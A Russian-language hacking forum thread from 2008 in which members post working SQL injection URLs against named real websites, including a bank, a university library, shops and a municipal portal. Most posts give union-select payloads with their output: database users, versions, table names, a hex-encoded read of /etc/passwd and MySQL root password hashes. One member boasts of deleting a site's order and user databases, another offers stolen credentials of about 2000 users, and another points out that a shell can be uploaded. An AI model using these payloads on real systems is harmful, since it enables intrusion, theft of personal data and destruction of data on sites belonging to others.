HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.02.2008, 02:24
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

И снова горе веб-дизайнеры: "GiG Web solutions" Киев

Форум - Web программирование (PHP,HTML,CSS,JavaScript,ASP)

_http://gig.kiev.ua/show_message.php?conf_id=-8+union+select+1,aes_decrypt(aes_encrypt(user(),0x 71),0x71),3,4,5,6/*&upper_id=0

gigkievua_user@localhost
gigkievua_db1
5.0.41-community

ветка пятая, раскручивать не стал
КТО ИМ ДАЁТ ДЕНЕГ???
 
Ответить с цитированием

Карейдзы нах!
  #2  
Старый 27.02.2008, 18:33
AlexGT
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
629558

Репутация: 52
Отправить сообщение для AlexGT с помощью ICQ
Talking Карейдзы нах!

После часика мучений удалос убить базу заказоф и юзероф и добавить новай тур = )

http://img264.imageshack.us/my.php?image=kareidzigz5.jpg
 
Ответить с цитированием

  #3  
Старый 27.02.2008, 04:09
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Цитата:
Только учусь!
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
все таки решил добить сам. пользователей больше 2000 (у меня пока 700, но скоро добъю) вывод типа имя пользователя,пароль,имя,мы о,аська(оч много элитных. Хотел бы себе ) кому надо обращайтесь в личку поделюсь.
------------------------------
прошу прощенья, если не в этой теме. Не наказывайте пожалуйста
 
Ответить с цитированием

  #4  
Старый 27.02.2008, 13:22
1NtR0
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391

Репутация: 209
По умолчанию

fantastic.library.cornell.edu


Код:
http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+concat_ws(0x3a3a3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
user() = fan@localhost
database() - fantastic
version() - 4.1.7-standart

Код:
http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9,10,11,12/*
Код:
http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+concat_ws(0x3a3a3a,user,password),2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
Смотрим исходник =)
 
Ответить с цитированием

банкирЫЫЫ -)
  #5  
Старый 27.02.2008, 13:21
x88x
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме:
1379382

Репутация: 378
Отправить сообщение для x88x с помощью ICQ
Exclamation банкирЫЫЫ -)

мда, все-таки решил выложить на благо родного ачата...
ВНИМАНИЕ: Сегодня у нас БАНК (точнее сайт онлайн банкинга) - дырявый как windows 98 =)

Версия мускула - 5 с хреном, соответственно, есть доступ к :
Цитата:
_http://www.mcb-bank.com/index.php?nd=menu&id=9999+union+select+1,TABLE_NAM E,3,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES/*
Наиболее приглянувшиеся мне таблицы:
===================================

isearch_admin_log

messages
message_id
message_image
message_month
message_year
message_title

specials
id
titel
text
image
active
...

users
id
username
password
admin
lastlogin

===================================

и самое интересное - КАВЫЧКИ НЕ ФИЛЬТРУЮТСЯ ВООБЩЕ!!!
так что, есть возможность залить шелл.

Вобщем, пользуйтесь на здоровье
 
Ответить с цитированием

  #6  
Старый 27.02.2008, 14:19
Saime
Новичок
Регистрация: 27.02.2008
Сообщений: 19
Провел на форуме:
34487

Репутация: 46
По умолчанию

FreeBSD Forum!!

Цитата:
http://www.bsdforums.org/forums/items/main.php?type=-1%20union%20select%201,user(),3,4,5,6,7,8,9,10,11, 12,13--
cycyouth.org ROOT

Цитата:
http://www.cycyouth.org/main.php?pgID=-1%20union%20select%201,concat(user,0x3a,password,0 x3a,file_priv),3,4,5,6,7,8,9,10+from+mysql.user--
root:*D4F86802E5F140FEA24A52DF0D5B9B0381A5119D:Y

tukums.lv ROOT

Цитата:
http://aa.tukums.lv/Default.asp?id=-1%20union%20select%201,2,password,4,5,6,7,8,9+from +mysql.user--
*923518145726A3E8F9098E43D6A56C2BC44BD1DC
 
Ответить с цитированием

  #7  
Старый 27.02.2008, 18:10
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Внимание!!!
никто никогда не хотел себе швейцарские часы?
теперь вы можете себе такое позволить :-D
---------------------------------------------------------------
шоп специализирующийся на продаже швейцарских часов
----------------------------------------------------------------
http://www.deka.dn.ua/navigation.php?nav_id=-8+union+select+1,2,3,4,5,6,concat(version(),0x3a,u ser(),0x3a,database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29/*

4.0.24-log:bazik@localhost:deka
---------------------------------------------------------------
письмо админу отправил

Последний раз редактировалось samarin; 27.02.2008 в 18:22..
 
Ответить с цитированием

  #8  
Старый 27.02.2008, 22:50
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

computergiants.com Шоп....Просто Шоп
_http://www.computergiants.com/stores/sitelet.asp?siteletid=-1'%66%72%6f%6d+1,2/*
 
Ответить с цитированием

  #9  
Старый 27.02.2008, 23:40
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Светотехника
http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,concat_ws(0x3a,version(),user( ),database()),3/*

5.0.32-Debian_7etch1-log:firstline_base@77.221.130.10:firstline_base

имена таблиц странные:

2103_forum_auth_access
2103_forum_banlist
2103_forum_categories
2103_forum_config
2103_forum_confirm
2103_forum_disallow
2103_forum_forum_prune
2103_forum_forums
2103_forum_groups
2103_forum_posts
2103_forum_privmsgs
2103_forum_privmsgs_text
2103_forum_ranks
2103_forum_sessions_keys
2103_forum_user_group

2103_forum_users
 
Ответить с цитированием

  #10  
Старый 28.02.2008, 00:38
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Туристическое снаряжение
-------------------------------------
http://www.alexikaoutdoor.com.ua/product.php?prod_id=-177+union+select+1,2,3,4,5,6,7,8,9,10/*
4.0.27-standard-log:dumala2_alexikaoutdoor:dumala2_axbase@localhos t
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ